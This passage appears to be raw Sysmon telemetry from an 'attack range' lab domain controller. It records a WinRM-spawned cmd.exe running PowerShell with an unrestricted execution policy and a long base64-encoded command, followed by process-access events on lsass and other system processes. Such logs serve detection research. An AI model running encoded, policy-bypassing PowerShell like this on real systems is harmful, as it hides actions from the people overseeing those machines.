EEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCC-5FA1-C900-000000008801}4812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCC-5FA1-C900-000000008801}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CCC-5FA1-C900-000000008801}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7CCC-5FA1-C700-000000008801}47084376C:\Windows\system32\WinrsHost.exe{D28789B6-7CCC-5FA1-C900-000000008801}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.246{D28789B6-7CCC-5FA1-C900-000000008801}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 